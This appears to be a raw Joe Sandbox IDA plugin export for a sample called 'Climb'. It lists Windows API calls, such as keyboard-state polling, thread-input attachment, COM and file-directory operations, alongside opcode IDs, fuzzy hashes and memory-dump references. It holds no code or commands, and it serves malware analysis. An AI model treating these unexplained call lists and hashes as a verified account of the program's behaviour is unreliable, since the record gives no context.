                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2762341140-0
                                                                                                                                                                      • Opcode ID: e940eaf66d02a94b58e709aed09deeabe8c20545f8b88de5b21c64e983ca6a24
                                                                                                                                                                      • Instruction ID: fb0ebf5115a461eff865d72c8a3d356e05e6d1a7178b9fe764707a7345f8edf8
                                                                                                                                                                      • Opcode Fuzzy Hash: e940eaf66d02a94b58e709aed09deeabe8c20545f8b88de5b21c64e983ca6a24
                                                                                                                                                                      • Instruction Fuzzy Hash: 62C12B75A00109AFCB14DFA5C888DAEBBF5FF48304B148599E91AEB361DB31ED45CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0055039F
                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 005503F8
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0055040A
                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0055042A
                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0055047D
                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00550491
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005504A6
                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 005504B3
                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005504BC
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005504CE
                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005504D9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                      • Opcode ID: 0f5c29389e4079e03f305c41d0015638323a89758e1987dacc06b9a5aa02b546
                                                                                                                                                                      • Instruction ID: 77ca45ea58038b7f1fc150e7c74a7ea3855034182b878d5a48ac60f848b04b5b
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f5c29389e4079e03f305c41d0015638323a89758e1987dacc06b9a5aa02b546
                                                                                                                                                                      • Instruction Fuzzy Hash: C3417031A00219DFCF10DFA4D8589AE7FB9FF58355F009429ED05A72A1CB74A949DFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0055A65D
                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 0055A6DE
                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 0055A6F9
                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 0055A713
                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 0055A728
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 0055A740
                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0055A752
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0055A76A
                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 0055A77C
                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 0055A794
                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 0055A7A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                      • Opcode ID: f793ff29be019015fe985ff2865d6e367591faa3501d874d871abcac684dfd03
                                                                                                                                                                      • Instruction ID: 62e1e0f493fcd2f23f6c1342f1e05689ffd0e1f0ea70b34f1c5ba8c743d5f855
                                                                                                                                                                      • Opcode Fuzzy Hash: f793ff29be019015fe985ff2865d6e367591faa3501d874d871abcac684dfd03
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F41E4749147CA6DFF31866088247A5BEF0BB25305F08825BDDC65A1C2EB9499CCCBA3
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                      • API String ID: 707087890-567219261
                                                                                                                                                                      • Opcode ID: f7d2c524a35d4e852726a872c803b2e714acdd84fc45f5c7d78266a2d22172b5
                                                                                                                                                                      • Instruction ID: 42b4e9c99057250a6d55e5481c2c3350dcc47dad34b48aec1e42fd8e2145d3e3
                                                                                                                                                                      • Opcode Fuzzy Hash: f7d2c524a35d4e852726a872c803b2e714acdd84fc45f5c7d78266a2d22172b5
                                                                                                                                                                      • Instruction Fuzzy Hash: AB51D431A0011A9BCB14DF6CD9518FEBBA5FF65364B20822AE92AE7280D731DD40D7A1
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoInitialize.OLE32 ref: 005741D1
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 005741DC
                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00590B44,?), ref: 00574236
                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 005742A9
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00574341
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00574393
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                      • API String ID: 636576611-1287834457
                                                                                                                                                                      • Opcode ID: e806fca0a7e874c46b6483f13e58c24568579428aea14c0d235a3855a922cf55
                                                                                                                                                                      • Instruction ID: 3241d14e69da2c157b9f78271cc8f47d351a98e5e3e955f58608112a38d0e50b
                                                                                                                                                                      • Opcode Fuzzy Hash: e806fca0a7e874c46b6483f13e58c24568579428aea14c0d235a3855a922cf55
                                                                                                                                                                      • Instruction Fuzzy Hash: D6619F742047019FD710DF54E888B6EBBE8BF89714F104909F9899B292C770ED48DF92
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00568C9C
                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00568CAC
                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00568CB8
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00568D55
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00568D69
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00568D9B
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00568DD1
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00568DDA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 1464919966-438819550
                                                                                                                                                                      • Opcode ID: c2d7058779c103769059473e14276d4cc65103028df5f07d9d2a03d65095f06c
                                                                                                                                                                      • Instruction ID: 8ece8819c7dfab308e4e4745694ac6ffc3e56e4d368c875ea9f006ba6e74122d
                                                                                                                                                                      • Opcode Fuzzy Hash: c2d7058779c103769059473e14276d4cc65103028df5f07d9d2a03d65095f06c
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E617BB25043099FDB10EF20C8449AEB7E8FF99314F04491EF999C7291DB35E949CBA2
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMenu.USER32 ref: 00584715
                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00584724
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005847AC
                                                                                                                                                                      • IsMenu.USER32(?), ref: 005847C0
                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 005847CA
                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005847F7
                                                                                                                                                                      • DrawMenuBar.USER32 ref: 005847FF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                      • String ID: 0$F
                                                                                                                                                                      • API String ID: 161812096-3044882817
                                                                                                                                                                      • Opcode ID: 3f014ea0c237f675cfa1a19a09da7c3e76d792385a17cf713be91703fd02ba62
                                                                                                                                                                      • Instruction ID: d4b524b3fb272ca6a3204e5431ebd2053cb098859378306323834eaf3a0a88ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 3f014ea0c237f675cfa1a19a09da7c3e76d792385a17cf713be91703fd02ba62
                                                                                                                                                                      • Instruction Fuzzy Hash: 41418775A0120AEFDB24EF64D884EAA7BB5FF09314F144029FE45A7390C770A914DF60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620
                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 005528B1
                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 005528BC
                                                                                                                                                                      • GetParent.USER32 ref: 005528D8
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 005528DB
                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 005528E4
                                                                                                                                                                      • GetParent.USER32(?), ref: 005528F8
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 005528FB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                                      • Opcode ID: 1bcda87cb6703dda546e2c320c02860886de2dba003f26feaeac07e20380ce00
                                                                                                                                                                      • Instruction ID: 9078e3999ec751764a604cd8ce5e189bc137bc3107ddb075df40a3c267d29a84
                                                                                                                                                                      • Opcode Fuzzy Hash: 1bcda87cb6703dda546e2c320c02860886de2dba003f26feaeac07e20380ce00
                                                                                                                                                                      • Instruction Fuzzy Hash: 2621AF75900118BBCF00ABA1CC95EFEBFB4FF16314F00411ABD51A3291DB395848DB60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620
                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00552990
                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 0055299B
                                                                                                                                                                      • GetParent.USER32 ref: 005529B7
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 005529BA
                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 005529C3
                                                                                                                                                                      • GetParent.USER32(?), ref: 005529D7
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 005529DA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                                      • Opcode ID: fd5eee43386740a423c5d2a730501f039de87fd5582e7a221f98dcff9204e6fe
                                                                                                                                                                      • Instruction ID: 9be325fe725083dcbefce6f69e3bc86f5a3d7a007f887e5cc7d722707ff49fde
                                                                                                                                                                      • Opcode Fuzzy Hash: fd5eee43386740a423c5d2a730501f039de87fd5582e7a221f98dcff9204e6fe
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B217CB5900118BBCF01ABA1CC95AFEBFB8FF16314F004017BD51A7291DA795849DBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00584539
                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0058453C
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00584563
                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00584586
                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005845FE
                                                                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00584648
                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00584663
                                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0058467E
                                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00584692
                                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005846AF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 312131281-0
                                                                                                                                                                      • Opcode ID: 94473135e109527670752904ca8be3b8f4c8d0c5578e911e52cf4d4eaeff9f6f
                                                                                                                                                                      • Instruction ID: b3e315ca0d804075d14cda3b8697f0b2bffee7d6f55fdbdbd44612ad2d3b36cf
                                                                                                                                                                      • Opcode Fuzzy Hash: 94473135e109527670752904ca8be3b8f4c8d0c5578e911e52cf4d4eaeff9f6f
                                                                                                                                                                      • Instruction Fuzzy Hash: DF616A75A00209AFDB10EFA4CC85EEE7BB8FB49710F100159FE14A72A1D774A945DF50
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0055BB18
                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BB2C
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0055BB33
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BB42
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0055BB54
                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BB6D
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BB7F
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BBC4
                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BBD9
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BBE4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                      • Opcode ID: c6b78fe0bad756d6c62bdd615e7f80e84973ad6b1b02064a23f26d6d365c1de0
                                                                                                                                                                      • Instruction ID: 8c7fd8003ec37bd9228adc85308f88d6e783c57390e8d7b038f17536226e9efe
                                                                                                                                                                      • Opcode Fuzzy Hash: c6b78fe0bad756d6c62bdd615e7f80e84973ad6b1b02064a23f26d6d365c1de0
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E318471504604AFEB209B15ECACF697BF9FB64323F104006FE05E61E4D7B5A9489F20
                                                                                                                                                                      APIs
                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004F2AF9
                                                                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 004F2B98
                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 004F2D7D
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00533A1B
                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00533A80
                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00533AAD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                      • String ID: close all
                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                      • Opcode ID: ea61b7eed7291297773c44dd6a97bd952ce3f6d24135f163322c14ef510555c1
                                                                                                                                                                      • Instruction ID: 9763b4cc9a847ba0741329414f6566d4755d41f3e04c64841398bf1d72f7cd65
                                                                                                                                                                      • Opcode Fuzzy Hash: ea61b7eed7291297773c44dd6a97bd952ce3f6d24135f163322c14ef510555c1
                                                                                                                                                                      • Instruction Fuzzy Hash: BAD19D30701212DFCB19EF15C959A69FBA0FF04714F1042AEE94AAB2A2CB74AD53CF55
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005689F2
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00568A06
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00568A30
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00568A4A
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00568A5C
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00568AA5
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00568AF5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 769691225-438819550
